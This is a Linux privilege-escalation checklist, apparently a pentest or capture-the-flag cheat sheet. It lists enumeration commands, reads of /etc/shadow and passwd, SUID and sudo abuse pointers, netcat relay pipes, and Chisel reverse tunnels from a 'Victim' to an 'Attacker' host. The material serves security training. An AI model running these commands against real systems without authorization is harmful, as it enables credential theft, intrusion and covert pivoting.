Privilege Escalation Check List - Linux

From RCATs


Shell Stabilization

python -c 'import pty;pty.spawn("/bin/bash")'   OR
python3 -c 'import pty;pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
Ctrl + Z [Background Process]
stty raw -echo ; fg ; 
reset
stty columns 200 rows 200

System Information[1]

* Get OS information # uname -a
* Check the PATH for any writable folders # find . -writable
* Check the env variables for any sensitive details # env
* Search for Kernel Exploits (i.e. PwnKit, DirtyCow etc) # linpeas
* Check the sudo version to see if it's vulnerable # sudo sudo -V
 
# Version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release

# Kernel Version
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz

# System enumeration Commands
ls /etc/*-release # -> looks for version numbers
cat /etc/os-release # -> cat out the file with the version numbers
hostname # -> return hostname of target
cat /etc/passwd # -> read passwd file for possible users
cat /etc/group # -> read groups for possible users
sudo cat /etc/shadow # -> read out shadow file for password hashes
ls -lh /var/mail # -> checks mail directories
ls /usr/bin/ & /sbin # -> for applications 
rpm -qa # -> list installed packages on RPM linux distro
dpkg -l # -> list installed packages on Debian linux distro
who # -> shows logged in users
whoami # -> shows what user you are logged in as
w # -> shows who is logged in and what they are doing
id # -> gives you your current UID and Group
last # -> displays login and logout info for users
sudo -l # -> what commands we can run sudo as

Enumeration Tools:

PEAS | LSE

Drives

* List mounted drives
* Any unmounted drives
* Any credentials in fstab

Installed Software

* Check for useful software installed
* Check for vulnerable software installed

dpkg -l # List all programs installed
dpkg -l | grep "program" # Search for a specific program
rpm -qa | grep "program" # Search for a specific program

Processes

* Is any unknown software running
* Is any software running with more privileges than it should have
* Can you modify the binary of any running process
* Monitor processes and check if any interesting process is running frequently
* Can you read some interesting process memory

# Commands
ps aux # Lists all the processes currently running on the machine
ps aux | grep "root" # Shows all process that belong to root
ps axjf #Lists all the processes in a tree format
ps 
 	-e -> all processes
	-f -> full-format listing
	-j -> jobs format
	-l -> long format
	-u -> user-oriented format
pspy can also be uploaded and ran to see if there are any repeating processes

Process Tools:

PSPY[2]

Scheduled Task/Cron Jobs

* Is the PATH being modified by some cron job and you can write to it
* Any wildcard in a cron job
* Some modifiable script is being executed or is inside a modifiable folder
* A script that is being executed very frequently

#Commands
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Services

* Any writeable .service file
* Any writeable binary executed by a service
* Any writeable folder in systemd PATH
* Is There any wrong allocations

#Commands
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk $1 ~ /^.*r.*/

Environment Variables

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Timers

* Any writeable timers

Sockets

* Any writeable .socket file
* Can you communicate with any socket
* HTTP sockets with interesting info

D-BUS

* Can you communicate with any D-Bus

#Commands
dbus-monitor

Network

* Enumerate the network to know where you are
* Open ports you couldn't access before getting a shell inside the machine
* Can you sniff traffic using tcpdump

ip a s # -> shows current ip

cat /etc/resolv.conf # -> shows the DNS servers

netstat #-> shows info about network connections
	-a #-> show both listening and non-listening sockets
	-l #-> show only listening sockets
	-n #-> show numeric output instead of resolving the IP address and port number
	-t #-> TCP
	-u #-> UDP
	-x #-> UNIX
	-p #-> show the PID and name of the program to which the socket belongs

sudo netstat -atupn #-> show all TCP / UDP listening and established conn with ports
sudo lsof -i #-> List of open files
sudo lsof - :port number #-> Checks for open files on a specific port

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
lastlog

Users

* Generic users/groups enumeration
* Do you have a very big UID? Is the machine vulnerable?
* Can you escalate privileges thanks to a group you belong to?
* Clipboard data?
* Password Policy?
* Try to use every known password that you have discovered previously to login with each possible user. Try to login also without a password.

Writeable Path

* If you have write privileges over some folder in PATH you may be able to escalate privileges

Sudo and SUID Commands

* Can you execute any command with sudo? Can you use it to READ, WRITE or EXECUTE anything as root? (GTFOBins)
* Is any exploitable SUID binary? (GTFOBins)
* Are sudo commands limited by path? can you bypass the restrictions?
* Sudo/SUID binary without path indicated?
* SUID binary specifying path? Bypass
* LD_PRELOAD vuln
* Lack of .so library in SUID binary from a writable folder?
* SUDO tokens available? Can you create a SUDO token?
* Can you read or modify sudoers files?
* Can you modify /etc/ld.so.conf.d/?
* OpenBSD DOAS command

# commands
find / -perm -4000 2>/dev/null 
find / -perm -u=s -type f 2>/dev/null
find / -name user.txt 2>/dev/null
find / -perm -u=s -type f 2>/dev/null | xarg ls -la
find / -user root -perm /4000 2>/dev/null
find / -type f -name '*.txt' 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {}; > /tmp/suid
getcap -r / 2>/dev/null

SUID Tools:[3]

GTFOBINS

Capabilities

* Has any binary unexpected capability

# Commands
getcap -r / 2>/dev/null # -> get capapbilities

ACL's

* Does any file have unexpected ACL

Open Shell Sessions

* Screen
* Tmux

SSH

* Debian OpenSSL Predictable PRNG - CVE-2008-0166
* SSH Interesting configuration values

# Dynamic Port Forwarding
ssh -D 1080 root@<ip>

# Port Forwarding
ssh -R <local-port>:127.0.0.1:<service-port> <username>@<local-machine>
ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port

SSH Tools:

Sshuttle

Port Forwarding

FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)
backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc
localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)

#Chisel Commands
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse #Server -- Attacker
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim

# Socks 
./chisel server -p 8080 --reverse #Server -- Attacker
./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client -- Victim
#And now you can use proxychains with port 1080 (default)

./chisel server -v -p 8080 --socks5 #Server -- Victim (needs to have port 8080 exposed)
./chisel client -v 10.10.10.10:8080 socks #Attacker

Port Forwarding Tools:

Chisel

Interesting Files

* Profile files - Read sensitive data? Write to privesc?
* passwd/shadow files - Read sensitive data? Write to privesc?
* Check commonly interesting folders for sensitive data
* Weird Location/Owned files, you may have access to or alter executable files
* Modified in last mins
* Sqlite DB files
* Hidden files
* Script/Binaries in PATH
* Web files (passwords?)
* Backups?
* Known files that contains passwords: Use Linpeas and LaZagne
* Generic search

Writeable Files

* Modify python library to execute arbitrary commands?
* Can you modify log files? Logtotten exploit
* Can you modify /etc/sysconfig/network-scripts/? Centos/Redhat exploit
* Can you write in ini, int.d, systemd or rc.d files?

Other Tricks

* Can you abuse NFS to escalate privileges?
* Do you need to escape from a restrictive shell?